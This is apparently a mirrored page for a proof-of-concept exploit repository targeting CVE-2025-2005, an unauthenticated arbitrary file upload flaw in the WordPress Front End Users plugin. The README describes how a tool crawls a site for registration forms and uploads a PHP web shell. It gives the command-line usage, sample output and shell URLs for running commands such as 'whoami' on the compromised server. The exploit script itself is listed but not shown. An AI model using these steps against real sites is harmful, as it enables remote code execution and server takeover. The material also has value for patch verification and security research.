来源

关联漏洞

Description

WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)

介绍

# WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)
This repository provides a Proof of Concept (PoC) exploit for the WordPress Front End Users plugin (versions up to 3.2.32), which is vulnerable to arbitrary file upload due to missing MIME/file-type validation in its registration form.This allows unauthenticated attackers to upload malicious files (e.g., web shells), potentially leading to Remote Code Execution (RCE) on the server.

##  Features

- CVE-2025-2005: WordPress Front End Users plugin file upload vulnerability
- Simple command-line interface
- Auto-discovery of registration forms
- Shell uploader with custom username/password

## How It Works
- It sends a registration request to the vulnerable FEUP registration form.
- Uploads a PHP shell via the file input field, bypassing file-type restrictions.
- Displays the upload status and informs if the site is vulnerable.

## Testing Targets
* Looks for registration forms containing:
* ewd-feup-register-form
* On URLs such as:
``` 
/register/
/signup/
```
* or any link found on homepage

## Getting Started
- Python 3.x
- requests and beautifulsoup4 modules:
```
pip install requests beautifulsoup4
```
## Installation
```
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005
```
## Usage
```
python3 exploit.py --url http://target.com --user hacker --password pass123
```
##  Sample Output
```
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!
```
## Run Exploit
```
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami
```

文件快照

 [4.0K]  /data/pocs/3e5c32bc982503cc806accb5737a4566c53ff9e0
├── [3.0K]  exploit.py
└── [1.7K]  README.md

0 directories, 2 files

备注